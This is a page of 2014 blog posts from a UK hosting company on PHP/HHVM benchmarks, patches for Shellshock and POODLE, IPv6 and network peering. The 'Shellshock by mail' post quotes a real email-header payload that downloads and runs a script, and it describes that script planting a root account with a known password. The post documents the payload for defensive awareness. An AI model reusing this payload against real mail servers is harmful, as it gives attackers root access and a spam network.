HipHop and WordPress: If you’re tired of tea then you’re tired of life…

November 14th, 2014 by

Hip Hop is not only a style of music, but also the name of a virtual machine written by Facebook which compiles PHP Just In Time to make it go quickly.

Now we receive lots of unsolicited advice about how to run a not very popular wordpress blog and cope with the volume of traffic. Usually this involves ripping and replacing the entire infrastructure from a standard Linux/Apache/MySQL/PHP stack to something different (Nginx/MariaDB/PostgreSQL) which may not even be able to run WordPress at all (e.g. node.js).

At Mythic Beasts we like to understand what we’re doing, rather than blindly installing Magic Go Faster Solution Number 7. So we set up a test 2GB dual core virtual machine, that runs WordPress and a selection of popular plugins ( WordPress SEO, Akismet, Safe Report Comments, Liveblog, Facebook, Yet Another Related Posts Plugin, WordPress Supercache and Jetpack, no endorsement implied). Then we benchmarked with siege and managed the following results.

Apache/mod_php : 5.10 trans/sec

and when you turn supercache on and serve cached pages you get

Apache/mod_php/supercache : 873.50 trans/sec

So this gives us two scenarios, pages which we have to generate content for which can easily cause load issues, and pages served from supercache in which our VM is fast enough for all practical purposes and will easily weather even very big traffic spikes from news websites or television adverts.

Now, it’s very popular to tell us to use Ngnix as it’s faster than Apache. Is it though?

Nginx/php-fpm: 5.70 trans/sec
Nginx/php-fpm/supercache: 2230.58 trans/sec

Wow! Nginx is three times quicker than Apache at serving cached pages. This is amazing, but not very helpful. It means when our webserver is serving pages really quickly, we serve pages at three times really quickly, but when we’re generating pages on demand, it’s about 10% quicker. That’s not very special and doesn’t justify a rip and replace of the whole installation for a 10% performance improvement.

A quick look at the VM during the testing tells us that the bottleneck is executing the PHP code which creates WordPress pages. The choice of webserver is basically irrelevant; almost all the server time is spent executing PHP and reading data from the database.

Enter HipHop Virtual Machine.


This is nothing to do with the HipHop Virtual Machine. But we like tea and Banging Tunes

It has one focus, to execute PHP quickly for Facebook. Facebook have a lot of servers and spend hundreds of millions to billions per year on servers and data centres. A 50% performance improvement in PHP saves them huge sums of money in data centres and servers alone, so it’s clearly worth them trying to optimise as much as possible.

Here’s what happens with Apache/Nginx running HHVM.

Apache/HHVM :           35.93 trans/sec
Apache/HHVM/supercache: 928.70 trans/sec
Nginx/HHVM :            33.78 trans/sec
Nginx/HHVM/supercache : 2137.67 trans/sec

This is a huge improvement for non cached pages – seven times faster. Cached pages are bottlenecked in the webserver so it makes minimal difference, but they were already so fast we weren’t worried about them. Again Apache/Nginx are still pretty much the same speed for generated pages, we’re still dominated by the code execution time but a seven fold performance improvement is worth seriously considering.

 Whilst we can reconfigure servers standing on our heads, we usually don't.

Whilst we can reconfigure servers standing on our heads, we usually don’t.
Photo credit: Mark Dolby, Flickr, CC-BY.

All I need to do now is see if I can find someone with a very busy WordPress site and a million complaining users who would like to test it to see if it’s really as good as the lab tests suggest it might be.


Very sorry to hear the news that Big Bank Hank who co-wrote the first ever hit Rap track Rappers Delight died earlier this week from kidney complications related to cancer.


You see, he was six foot one, and he was tons of fun

Difficult customers

November 4th, 2014 by

At Mythic Beasts we try very hard to keep our customers happy, and to do our absolute best to meet their requirements in requests, even if they’re occasionally a little bit unusual.

One of our long standing customers is refreshing some of their hardware, and we had the following exchange to sort out the details

customer> The following 8 servers have been decommissioned and now need removing: 

mythic-beasts> We can sort that for you. Do you want to collect the servers or shall we recycle them for you?

customer> The drives can be kept for spares but you can ditch the servers or make a fort out of them or something..
IMG_0314

a 1U server fort

Now it’s not really our field of expertise, but we think we’ve got a reasonable start on building a defensible concentric castle although we ran out of servers before we could start building the outer curtain wall.

Shellshock by mail

October 28th, 2014 by

We’ve already written about ShellShock, a vulnerability in bash.

Now we patched our systems quickly against it because we were aware that it looked easy to exploit and there were a great many different paths by which a piece of untrusted user input could arrive at a bash shell and exploit it. We’d seen several attacks over the web almost immediately, but now we’ve seen them starting to arrive by email.


To:() { :; }; /bin/sh -c '/bin/sh -c 'cd /tmp ;curl -sO
127.0.0.1/ex.sh;lwp-download http://127.0.0.1/ex.sh;wget
127.0.0.1/ex.sh;fetch 127.0.0.1/ex.sh;sh ex.sh;rm -fr ex.*' &'
&;
References:() { :; }; ...payload...
Cc:() { :; }; ...payload...
Bcc:() { :; }; ...payload...
From:() { :; }; ...payload...
Subject:() { :; }; ...payload...
Date:() { :; }; ...payload...
Message-ID:() { :; }; ...payload...
Comments:() { :; }; ...payload...
Keywords:() { :; }; ...payload...
Resent-Date:() { :; }; ...payload...
Resent-From:() { :; }; ...payload...

I’ve de-fanged the exploit by changing the IP address. The script downloaded adds a root user called inetd with a password of Inetd1!@#, to the machine, neatly giving a remote shell on any machine it succeeds on. The webserver logs will handily hold the IP addresses of all the infected machines. So all you need now is a nasty piece of spamming software to try and send a message through every mail server in the world and you’ve built a spam network consisting entirely of legitimate mailservers, or if you’re a government spying agency – the ability to intercept vast quantities of email with ease.

Note: It’s been commented that this only affects you if your mail server is running as root. That’s not true – imagine that it’s an email for root@the-mail-server-host which goes into a mail filter that calls out to a shell, not to mention depositing root exploits into logfiles that might get processed. There’s a vast number of subtle ways that this could end up in a copy of bash running as root.

Poodle and Pound

October 24th, 2014 by

Earlier this week, we wrote about the POODLE security vulnerability. As as result of this, we’ve been working with our customers to disable SSLv3 support from their SSL/TLS services.

At Mythic Beasts, we use Pound as a load balancer fairly extensively. It’s free, secure, fairly quick and easy to configure. Unfortunately, it didn’t have a configuration option to disable SSLv3.

Image courtesy of SOMMAI at FreeDigitalPhotos.net

Image courtesy of SOMMAI at FreeDigitalPhotos.net

One of the advantages of hosting on open source software is that we’re not at the mercy of a vendor for software updates, so we took a patch which adds the ability to disable SSLv3, added it to the standard Debian package and made it available to our managed customers through our private package repository.

This same package is now in Debian unstable and is working its way into the Debian security and backports repositories. This is made easier because the Debian pound maintainer, Brett Parker, works for Mythic Beasts and wrote the technical details on his blog.

As we have a number of customers using pound on CentOS, we have also created patched versions of CentOS packages of Pound, and raised a ticket With Fedora in order to get this into the stable build.

IPv6 support in the UK

October 22nd, 2014 by

Recently Mythic Beasts went to the first meeting of the UK IPv6 Council, a non profit group to assist in rolling out IPv6 across the UK. There was a rapid exchange of knowledge, ideas and progress between organisations.

We heard from network engineers within BT, BSkyB and Virgin Media covering well over half of all the end users in the UK. BT and Virgin have enough IPv4 addresses not to require rolling out IPv6, BSkyB don’t and therefore need to either implement IPv6 or Carrier Grade NAT (CGN), and they really don’t like CGN. Virgin are having portions of their address space taken by other parts of the parent company so may also need IPv6 or CGN. They too don’t like CGN, and already have IPv6 support in all their SuperHubs, even if the functionality is currently disabled. All three companies have IPv6 support in various levels of trial with internal staff members running dual stack. However, all three have plans to roll out customer trials in the first part of 2015.

We also heard from the Belgian IPv6 council about how roll-out in Belgium occurred to nearly 30% of all end users having native IPv6, they went from less than 1% in May 2013, to 16% in May 2014, and 27% now. Once a couple of their large providers started enabling IPv6 the roll-out was very fast. It’s likely the same thing could happen in the UK with three major providers having significant IPv6 plans within the next 12 months.

As an idea of how quickly things might happen, T-Mobile USA has gone from nowhere to the 10th largest IPv6 deployment with 44% of their network IPv6 enabled within 12 months.

So at a guess, Mythic Beasts think that IPv6 rollout in the UK by December 2015, will be either less than 1%, about 25% or roughly 50%. We aren’t sure which, but we think it’s wise to be prepared for every eventuality. To help you with that we have an IPv6 health checker.

Security issue in bash

September 24th, 2014 by

We’ve just become aware of a potentially very serious security hole in bash which is potentially remotely executable.

https://securityblog.redhat.com/2014/09/24/bash-specially-crafted-environment-variables-code-injection-attack/

Whilst we don’t have enough details yet to evaluate the seriousness of this we’ve already applied the fixes to our administration servers and VPN gateways, and are now looking at rolling out the updates to all affected managed customers. Managed customers should expect an email shortly with further details.

Ticket escalation

September 24th, 2014 by

Managed server customers receive as standard 24/7 monitoring of their servers, we check that the machines are up, that ssh is running, that the web-server is delivering the correct content amongst other checks. In the event a check fails our staff are alerted via SMS/pager to investigate the issue.

We’ve now enhanced this service for managed server customers, in the unlikely event you have a service affecting issue that the automated monitoring hasn’t caught, you can file an urgent ticket through our control panel which will create a new support ticket and alert our staff via SMS to deal with your issue.

This was a feature request from a customer in a meeting last Thursday and went into production as a service enhancement on Tuesday, we’re always receptive to suggestions from customers to make our offering better.

bzip2

September 15th, 2014 by

bzip2 is one of the great unix tools. It compresses and uncompresses data, and it does it very well. We’ve been using it within Mythic Beasts for years and it’s operated absolutely flawlessly.

We’re happy to report that we’re now hosting the main distribution site for bzip2

Ice Bucket

September 1st, 2014 by

Thanks to Jonathan Wright who runs a very big website, for a nomination.

I’ve nominated Matt Smith, Rob McQueen and Neil McGovern.

Thanks to Ben Howe, our gap year student who’s adequately demonstrated to his colleagues the definition of a career limiting move by dunking a bucked of ice over his boss, The Haymakers for kindly providing the location for the company meeting, the chilled water and the ice, and the rest of my Mythic Beasts colleagues for filming and laughing.

Depending on nowhere by peering with everyone everywhere

August 29th, 2014 by

We’ve been adding some more peering sessions to improve our network redundancy. We already had direct peering with every significant UK ISP, we’ve now enhanced this so that one peering session terminates at one of the Telehouse sites, and the second terminates at one of the Telecity or Equinix sites. Each peering session is on a different London Internet Exchange (LINX) network which are physically separate from each other, and where possible we’ve preferred peering sessions that remain within a single building.

We have equal capacity on both networks at LINX, so unlike many ISPs with a single peering port or unequal capacity, in the event of a severe failure (e.g. a whole network or data centre) we just automatically migrate our traffic to our other peering link, rather than falling back to burst bandwidth with our transit providers. We feel that’s a risky strategy because failures are likely to be correlated, lots of ISPs will fall back to transit all at the same time in a badly planned and uncoordinated fashion which could cause a huge traffic spike upstream.

We light our own fibre ring around our core Docklands data centres, and have full transit and peering at both of our core POPs, with dual routers in each, and can offer full or partial transit at any of our data centres.